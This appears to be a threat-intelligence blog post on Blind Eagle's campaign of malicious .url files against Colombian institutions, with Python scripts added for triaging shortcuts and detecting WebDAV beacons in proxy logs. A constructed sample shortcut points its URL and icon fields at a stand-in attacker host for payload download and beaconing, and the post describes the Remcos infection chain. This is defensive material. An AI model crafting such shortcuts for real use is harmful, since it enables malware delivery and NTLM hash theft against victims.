Blind Eagle Targets Colombian Government with Malicious .url Files

by CybrGPT

A cyber-threat campaign that has targeted Colombian government institutions and other organizations since November 2024 has been attributed to the threat group Blind Eagle, also tracked as APT-C-36. The attackers distribute malicious .url (Internet Shortcut) files that reproduce the behaviour of the recently patched CVE-2024-43451 vulnerability without actually exploiting it.

CVE-2024-43451, patched by Microsoft on November 12 2024, allowed attackers to obtain a user's NTLMv2 hash with minimal interaction. A captured NTLMv2 response can be relayed to other services or cracked offline, either of which lets the attacker authenticate as the victim.

While Blind Eagle's .url variant does not exploit this vulnerability directly, it still triggers a WebDAV request to attacker-controlled infrastructure when the file is handled in specific ways, such as right-clicking, deleting or dragging it, rather than opening it. That request tells the attackers that the file has reached a victim's machine. If the user then double-clicks the file, a second WebDAV request downloads the next-stage payload, which is executed.
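An Internet Shortcut is a small INI-style text file, and the paths it contains decide which requests Explorer makes on the user's behalf. The triage script below is an added example, not code from the article or from Check Point Research: it parses a .url file and flags any field whose value resolves to a remote UNC or WebDAV location, since a path such as `\\host@80\DavWWWRoot\...` or `file://host/...` is what makes Windows reach out over SMB and, via the WebClient service, WebDAV. Which fields Blind Eagle abused is not stated on the page; the choice of `URL`, `IconFile` and `WorkingDirectory`, the sample files and the TEST-NET address 203.0.113.10 are all assumptions made for illustration.

```python
import configparser
import re
from urllib.parse import urlparse

# Fields of an [InternetShortcut] section that Explorer resolves as a path or URL.
# IconFile is fetched when the shortcut is rendered or touched (right-click,
# delete, drag); URL is opened on double-click. Assumed set, not from the article.
PATH_FIELDS = ("url", "iconfile", "workingdirectory")

# \\host\share, \\host@SSL\share, \\host@80\share ... : an @SSL/@port suffix or a
# DavWWWRoot component forces the WebClient (WebDAV) redirector; a bare UNC path
# is tried over SMB first and falls back to WebDAV when port 445 is unreachable.
UNC_RE = re.compile(r"^\\\\([^\\@]+)(@(SSL|\d+))?\\", re.IGNORECASE)
DRIVE_RE = re.compile(r"^[A-Za-z]:\\")


def parse_url_file(text):
    """Return the [InternetShortcut] fields (keys lower-cased) as a dict."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def classify_target(value):
    """Classify a field value: 'local', 'web', 'remote' (UNC/SMB), 'webdav' or 'other'."""
    v = value.strip()
    m = UNC_RE.match(v)
    if m:
        return "webdav" if (m.group(2) or "davwwwroot" in v.lower()) else "remote"
    if DRIVE_RE.match(v):          # C:\... ; checked before urlparse, which would read "C" as a scheme
        return "local"
    parsed = urlparse(v)
    if parsed.scheme == "file":    # file://host/share/... is a UNC path in disguise
        host = parsed.netloc.lower()
        return "remote" if host and host != "localhost" else "local"
    if parsed.scheme in ("http", "https"):
        return "web"
    return "other"


def triage_url_file(text):
    """List (field, kind, value) for every field that points off the local machine."""
    fields = parse_url_file(text)
    findings = []
    for key in PATH_FIELDS:
        if key in fields:
            kind = classify_target(fields[key])
            if kind in ("remote", "webdav"):
                findings.append((key, kind, fields[key]))
    return findings


# Constructed samples for demonstration; they are not the actual lure files.
BENIGN = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=C:\Windows\System32\url.dll
IconIndex=0
"""

SUSPICIOUS = r"""[InternetShortcut]
URL=file://203.0.113.10/share/update.exe
IconFile=\\203.0.113.10@80\DavWWWRoot\icon.ico
IconIndex=0
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, triage_url_file(sample))
```

Running the script prints an empty list for the benign shortcut and two findings for the suspicious one: the `URL` field resolves to a remote SMB/WebDAV path and the `IconFile` field to an explicit WebDAV path, which is the pattern the article describes (a beacon on interaction, a payload fetch on click). In a mail gateway or EDR pipeline the same check can run on attachments and downloads before a user ever touches the file.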

Just six days after Microsoft issued the patch, Blind Eagle incorporated this new attack vector into its operations. The group primarily targeted Colombian judicial institutions, private organizations and other government agencies.

One of the largest observed campaigns, on December 19 2024, infected over 1600 victims. Given Blind Eagle’s historically selective targeting, this number is significant.

Delivery Methods and Malware Analysis

Blind Eagle has been known to distribute its malware through legitimate file-sharing platforms like Google Drive and Dropbox. According to a new advisory by Check Point Research (CPR), it has recently expanded to using Bitbucket and GitHub to host its payloads.

The attack chain uses HeartCrypt, a packer-as-a-service, to protect a .NET stage believed to be a variant of PureCrypter, a loader/crypter, which in turn delivers the final-stage payload: Remcos RAT, a commercially sold remote access trojan.

In January 2025, a new wave of campaigns labeled “socialismo” and “miami” involved the distribution of malicious .url files via compromised Google Drive accounts. The malware executed a complex infection chain that resulted in data exfiltration and system compromise.

The group's GitHub repository is updated frequently, with commit timestamps clustering in the UTC-5 time zone. That offset matches Colombia and its neighbours in South America, reinforcing suspicions about the group's origin.

Another campaign in December 2024, named “Parasio,” leveraged Bitbucket instead of GitHub to distribute the Remcos RAT payload. This campaign alone resulted in approximately 9000 infections over one week.


Past Phishing Campaigns and Data Exposure

CPR also discovered evidence of an additional phishing campaign run by Blind Eagle. In February 2025, the group mistakenly exposed an HTML file containing personally identifiable information (PII) from a phishing campaign that impersonated Colombian banks.

The dataset included 8075 valid entries, with credentials and ATM PINs among the compromised information. Several Colombian government email accounts were also among the targeted victims.

“Blind Eagle remains one of the most active and dangerous threat actors in Latin America, with a particular focus on Colombia’s public and private sectors,” CPR warned.

“A key factor in its success is its ability to exploit legitimate file-sharing platforms, including Google Drive, Dropbox, Bitbucket, and GitHub, allowing it to bypass traditional security measures and distribute malware stealthily.”

To counter this threat, organizations are advised to enforce strict security policies, disable NTLM authentication where possible and monitor network activity for unusual WebDAV requests. In practice that also means blocking outbound SMB (TCP 445) and WebDAV traffic to untrusted hosts at the perimeter, since both the beacon and the payload download described above leave the network, and treating .url files arriving by email or from file-sharing links as blockable attachments.
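The "unusual WebDAV requests" worth hunting for are easy to recognise once they are in a proxy or firewall log: the Windows WebClient service identifies itself with a `Microsoft-WebDAV-MiniRedir/<build>` user agent and opens with `OPTIONS`/`PROPFIND` before any `GET`. The detector below is an added example, not from the article or Check Point Research. It assumes Apache combined-log style proxy lines, a small allowlist of legitimate internal WebDAV servers, and constructed sample entries (the 203.0.113.10 address is from the TEST-NET range; `files.corp.example` is an assumed internal server).

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed proxy log lines (combined-log style; the format is an assumption):
# src_ip ident user [timestamp] "METHOD url HTTP/1.1" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
10.0.0.15 - - [19/Dec/2024:09:12:01 -0500] "PROPFIND http://203.0.113.10/DavWWWRoot/ HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0.19045"
10.0.0.15 - - [19/Dec/2024:09:12:02 -0500] "GET http://203.0.113.10/DavWWWRoot/icon.ico HTTP/1.1" 200 1024 "-" "Microsoft-WebDAV-MiniRedir/10.0.19045"
10.0.0.22 - - [19/Dec/2024:09:13:10 -0500] "PROPFIND https://files.corp.example/dav/ HTTP/1.1" 207 700 "-" "Microsoft-WebDAV-MiniRedir/10.0.19045"
10.0.0.31 - - [19/Dec/2024:09:14:00 -0500] "GET https://www.example.com/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Internal WebDAV servers that the WebClient service is allowed to talk to (assumed).
ALLOWED_WEBDAV_HOSTS = {"files.corp.example"}
# Methods the Windows WebDAV redirector sends before fetching anything.
WEBDAV_METHODS = {"OPTIONS", "PROPFIND"}
WEBCLIENT_UA_PREFIX = "Microsoft-WebDAV-MiniRedir/"


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["host"] = (urlparse(entry["url"]).hostname or "").lower()
    return entry


def is_suspect(entry):
    """WebDAV activity (by method or by the WebClient user agent) to a non-allowlisted host."""
    if entry["host"] in ALLOWED_WEBDAV_HOSTS:
        return False
    from_webclient = entry["ua"].startswith(WEBCLIENT_UA_PREFIX)
    return from_webclient or entry["method"] in WEBDAV_METHODS


def find_webdav_beacons(log_text):
    """Group suspect requests by source IP: {src: [(method, host), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_suspect(entry):
            hits[entry["src"]].append((entry["method"], entry["host"]))
    return dict(hits)


if __name__ == "__main__":
    for src, requests in find_webdav_beacons(SAMPLE_LOG).items():
        print(src, requests)
```

On the sample data only 10.0.0.15 is reported: a `PROPFIND` followed by a `GET` of an icon from an unknown host, the footprint of a shortcut whose icon path points at the attacker's WebDAV share. The internal `PROPFIND` to the allowlisted server and the ordinary browser traffic are ignored. A real deployment would feed the detector from the proxy's actual log format and treat a `PROPFIND` to any external host as a high-signal alert, because ordinary browsing never produces one.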


© 2025 cybrgpt.com – All rights reserved.